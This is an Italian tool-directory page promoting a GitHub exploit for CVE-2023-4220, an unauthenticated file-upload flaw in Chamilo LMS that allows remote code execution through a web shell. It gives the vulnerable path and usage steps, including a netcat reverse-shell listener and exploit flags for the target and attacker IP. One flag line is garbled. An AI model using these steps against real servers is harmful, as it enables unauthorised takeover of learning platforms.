Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/bueno-armando/cve-2023-4220-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubbueno-armando/cve-2023-4220-rce

CVE-2023-4220-RCE

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-4220-RCE

Sommario

Avviso di Starlabs

  • Prodotto interessato: Chamilo <= v1.11.24
  • Descrizione: Caricamento file non limitato nella funzionalità di caricamento di file grandi in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e ottenere esecuzione remota di codice tramite il caricamento di una web shell.
  • Punteggio CVSS: 8.1 (Alto)

Utilizzo

  1. Imposta un listener netcat (se vuoi una reverse shell)
root@kitploit:~
sudo nc -lnvp 443
  1. Esegui l'exploit
root@kitploit:~
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
  • Flag per la reverse shell
    • -lh/--localhost: IP dell'attaccante
    • **-lp/--localtcat porta listener
Scarica lo strumento